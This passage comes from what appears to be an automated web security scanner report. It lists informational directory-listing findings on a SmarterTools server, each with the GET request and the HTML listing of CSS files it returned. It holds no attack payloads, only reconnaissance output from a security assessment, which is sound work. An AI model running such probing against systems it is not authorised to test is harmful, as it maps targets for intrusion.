Path:   /App_Themes/Default/CSS/Error/

Request

GET /App_Themes/Default/CSS/Error/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Error/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Error/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 67 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 1,016 <A href="Error.css">Error.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.10. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/FileDownload/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/FileDownload/

Request

GET /App_Themes/Default/CSS/FileDownload/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1423
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/FileDownload/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/FileDownload/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,182 <A href="FileStorageDownload.css">FileStorageDownload.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.11. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/GettingStarted/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/GettingStarted/

Request

GET /App_Themes/Default/CSS/GettingStarted/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1417
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/GettingStarted/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/GettingStarted/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 684 <A href="GettingStarted.css">GettingStarted.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.12. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Internal/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Internal/

Request

GET /App_Themes/Default/CSS/Internal/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1579
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Internal/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Internal/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 272 <A href="FilterBar.css">FilterBar.css</A>
Thursday, October 07, 2010 01:00 PM 439 <A href="Intranet.css">Intranet.css</A>
Thursday, October 07, 2010 01:00 PM 950 <A href="Sidebar.css">Sidebar.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.13. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Login/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Login/

Request

GET /App_Themes/Default/CSS/Login/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Login/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Login/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 69 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 1,304 <A href="Login.css">Login.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.14. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Mail/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Mail/

Request

GET /App_Themes/Default/CSS/Mail/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1911
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Mail/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Mail/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 7,877 <A href="Calendar.css">Calendar.css</A>
Thursday, October 07, 2010 01:00 PM 3,644 <A href="Compose.css">Compose.css</A>
Thursday, October 07, 2010 01:00 PM 319 <A href="Notes.css">Notes.css</A>
Thursday, October 07, 2010 01:00 PM 1,043 <A href="ReadMail.css">ReadMail.css</A>
Thursday, October 07, 2010 01:00 PM 368 <A href="RSS.css">RSS.css</A>
Thursday, October 07, 2010 01:00 PM 1,046 <A href="Sync.css">Sync.css</A>
Thursday, October 07, 2010 01:00 PM 1,860 <A href="Tasks.css">Tasks.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.15. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Main/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Main/

Request

GET /App_Themes/Default/CSS/Main/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 4651
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Main/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Main/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 490 <A href="!Reset.css">!Reset.css</A>
Thursday, October 07, 2010 01:00 PM 230 <A href="ActionBar.css">ActionBar.css</A>
Thursday, October 07, 2010 01:00 PM 2,358 <A href="AdvancedSearch.css">AdvancedSearch.css</A>
Thursday, October 07, 2010 01:00 PM 707 <A href="Attachments.css">Attachments.css</A>
Thursday, October 07, 2010 01:00 PM 1,341 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 519 <A href="Content.css">Content.css</A>
Thursday, October 07, 2010 01:00 PM 664 <A href="DragDrop.css">DragDrop.css</A>
Thursday, October 07, 2010 01:00 PM 2,930 <A href="FilterBar.css">FilterBar.css</A>
Thursday, October 07, 2010 01:00 PM 776 <A href="FlashFileUpload.css">FlashFileUpload.css</A>
Thursday, October 07, 2010 01:00 PM 256 <A href="Folders.css">Folders.css</A>
Thursday, October 07, 2010 01:00 PM 322 <A href="Footer.css">Footer.css</A>
Thursday, October 07, 2010 01:00 PM 532 <A href="Frame.css">Frame.css</A>
Thursday, October 07, 2010 01:00 PM 5,743 <A href="Grid.css">Grid.css</A>
Thursday, October 07, 2010 01:00 PM 9,693 <A href="HyperMenu.css">HyperMenu.css</A>
Thursday, October 07, 2010 01:00 PM 634 <A href="HyperPager.css">HyperPager.css</A>
Thursday, October 07, 2010 01:00 PM 1,032 <A href="HyperSplitter.css">HyperSplitter.css</A>
Thursday, October 07, 2010 01:00 PM 3,525 <A href="HyperTabstrip.css">HyperTabstrip.css</A>
Thursday, October 07, 2010 01:00 PM 2,059 <A href="HyperTreeView.css">HyperTreeView.css</A>
Thursday, October 07, 2010 01:00 PM 2,100 <A href="HyperWindow.css">HyperWindow.css</A>
Thursday, October 07, 2010 01:00 PM 1,391 <A href="Invitations.css">Invitations.css</A>
Thursday, October 07, 2010 01:00 PM 1,025 <A href="LitePanel.css">LitePanel.css</A>
Thursday, October 07, 2010 01:00 PM 1,169 <A href="LoadingGlyph.css">LoadingGlyph.css</A>
Thursday, October 07, 2010 01:00 PM 945 <A href="MainLayout.css">MainLayout.css</A>
Thursday, October 07, 2010 01:00 PM 1,618 <A href="ModalDialogs.css">ModalDialogs.css</A>
Thursday, October 07, 2010 01:00 PM 730 <A href="PageTitle.css">PageTitle.css</A>
Thursday, October 07, 2010 01:00 PM 2,207 <A href="Preview.css">Preview.css</A>
Thursday, October 07, 2010 01:00 PM 370 <A href="Reminders.css">Reminders.css</A>
Thursday, October 07, 2010 01:00 PM 47 <A href="Root.css">Root.css</A>
Thursday, October 07, 2010 01:00 PM 173 <A href="Sharebar.css">Sharebar.css</A>
Thursday, October 07, 2010 01:00 PM 3,487 <A href="Sidebar.css">Sidebar.css</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="TiledView.css">TiledView.css</A>
Thursday, October 07, 2010 01:00 PM 463 <A href="TipText.css">TipText.css</A>
Thursday, October 07, 2010 01:00 PM 2,799 <A href="ValidatedSettings.css">ValidatedSettings.css</A>
Thursday, October 07, 2010 01:00 PM 1,264 <A href="Validation.css">Validation.css</A>
Thursday, October 07, 2010 01:00 PM 426 <A href="WarningMessage.css">WarningMessage.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.16. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Popup/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Popup/

Request

GET /App_Themes/Default/CSS/Popup/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Popup/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Popup/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 230 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 549 <A href="Popup.css">Popup.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.17. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Portal/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Portal/

Request

GET /App_Themes/Default/CSS/Portal/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:18 GMT
Content-Length: 2520
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Portal/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Portal/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 959 <A href="Cust_ButtonBar.css">Cust_ButtonBar.css</A>
Thursday, October 07, 2010 01:00 PM 5,263 <A href="Cust_Chat.css">Cust_Chat.css</A>
Thursday, October 07, 2010 01:00 PM 994 <A href="Cust_ColorKey.txt">Cust_ColorKey.txt</A>
Thursday, October 07, 2010 01:00 PM 6,143 <A href="Cust_Grid.css">Cust_Grid.css</A>
Thursday, October 07, 2010 01:00 PM 1,895 <A href="Cust_KnowledgeBase.css">Cust_KnowledgeBase.css</A>
Thursday, October 07, 2010 01:00 PM 696 <A href="Cust_News.css">Cust_News.css</A>
Thursday, October 07, 2010 01:00 PM 3,599 <A href="Cust_Print.css">Cust_Print.css</A>
Thursday, October 07, 2010 01:00 PM 3,177 <A href="Cust_SearchResults.css">Cust_SearchResults.css</A>
Thursday, October 07, 2010 01:00 PM 15,729 <A href="Cust_Skin.css">Cust_Skin.css</A>
Thursday, October 07, 2010 01:00 PM 527 <A href="Cust_SocialNetwork.css">Cust_SocialNetwork.css</A>
Thursday, October 07, 2010 01:00 PM 8,741 <A href="Cust_TicketViewer.css">Cust_TicketViewer.css</A>
Thursday, October 07, 2010 01:00 PM 1,070 <A href="Survey.css">Survey.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.18. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Print/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Print/

Request

GET /App_Themes/Default/CSS/Print/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1381
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Print/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Print/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 716 <A href="Print.css">Print.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.19. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Reporting/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Reporting/

Request

GET /App_Themes/Default/CSS/Reporting/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:28 GMT
Content-Length: 1488
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Reporting/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Reporting/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 194 <A href="Dashboard.css">Dashboard.css</A>
Thursday, October 07, 2010 01:00 PM 6,581 <A href="Reports.css">Reports.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.20. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Stats/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Stats/

Request

GET /App_Themes/Default/CSS/Stats/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:30 GMT
Content-Length: 1678
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Stats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
